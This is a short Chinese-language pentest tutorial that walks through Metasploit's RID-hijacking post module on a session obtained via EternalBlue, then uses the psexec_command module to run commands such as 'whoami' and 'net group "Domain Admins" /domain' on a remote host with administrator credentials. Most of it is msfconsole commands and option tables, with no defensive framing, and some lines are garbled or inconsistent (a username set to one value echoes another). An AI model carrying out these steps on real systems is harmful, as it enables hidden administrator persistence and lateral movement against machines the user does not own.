MSF實現RID劫持和MSF實現PsExec執行命令

msf實現rid劫持

---

rid劫持原理：

每一個賬戶都有一個指定的RID來標識它。與域控制器不一樣，Windows工做站和服務器會將大部分數據存儲在HKLM\SAM\SAM\Domains\Account\Users項中，這須要訪問System權限。它將經過設置一個相對標識符（RID）來更改賬戶屬性，該標識符應由目標機器上的一個現有帳戶擁有。利用一些Windows本地用戶管理完整性的缺陷，該模塊將容許使用一個已知賬戶憑證（如GUEST賬戶）進行身份驗證，並使用另外一個現有賬戶（如Administrator賬戶）的權限進行訪問，即便禁用了Administrator帳戶。

實戰

---

固然須要你具有一個shell，background，做爲session

msf5 exploit(windows/smb/ms17_010_eternalblue) > use post/windows/manage/rid_hijack
msf5 post(windows/manage/rid_hijack) > set session 2
session => 2
msf5 post(windows/manage/rid_hijack) > show options

Module options (post/windows/manage/rid_hijack):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   GETSYSTEM      false            yes       Attempt to get SYSTEM privilege on the target host.
   GUEST_ACCOUNT  false            yes       Assign the defined RID to the Guest Account.
   PASSWORD                        no        Password to set to the defined user account.
   RID            500              yes       RID to set to the specified account.
   SESSION        2                yes       The session to run this module on.
   USERNAME                        no        User to set the defined RID.

msf5 post(windows/manage/rid_hijack) > set username ridhijack
username => administrator
msf5 post(windows/manage/rid_hijack) > set password xxxxxxxxxxx
password => xxxxxxxxxxx
msf5 post(windows/manage/rid_hijack) > set GETSYSTEM true
GETSYSTEM => true
msf5 post(windows/manage/rid_hijack) > run

話外補充：MSF使用PsExec

---

msf5 post(windows/manage/rid_hijack) > use auxiliary/admin/smb/psexec_command
msf5 auxiliary(admin/smb/psexec_command) > set rhosts 172.16.204.80
rhosts => 172.16.204.80
sf5 auxiliary(admin/smb/psexec_command) > show options

Module options (auxiliary/admin/smb/psexec_command):

   Name                  Current Setting                    Required  Description
   ----                  ---------------                    --------  -----------
   COMMAND               net group "Domain Admins" /domain  yes       The command you want to execute on the remote host
   RHOSTS                172.16.204.80                      yes       The target address range or CIDR identifier
   RPORT                 445                                yes       The Target port
   SERVICE_DESCRIPTION                                      no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                     no        The service display name
   SERVICE_NAME                                             no        The service name
   SMBDomain             .                                  no        The Windows domain to use for authentication
   SMBPass                                                  no        The password for the specified username
   SMBSHARE              C$                                 yes       The name of a writeable share on the server
   SMBUser                                                  no        The username to authenticate as
   THREADS               1                                  yes       The number of concurrent threads
   WINPATH               WINDOWS                            yes       The name of the remote Windows directory

msf5 auxiliary(admin/smb/psexec_command) > set smbuser administrator
smbuser => administrator
msf5 auxiliary(admin/smb/psexec_command) > set smbpass xxxxx
smbpass => xxxxx
msf5 auxiliary(admin/smb/psexec_command) > set smbdomain sec.com
smbdomain => sec.com
msf5 auxiliary(admin/smb/psexec_command) > set command whoami
command => whoami
msf5 auxiliary(admin/smb/psexec_command) > run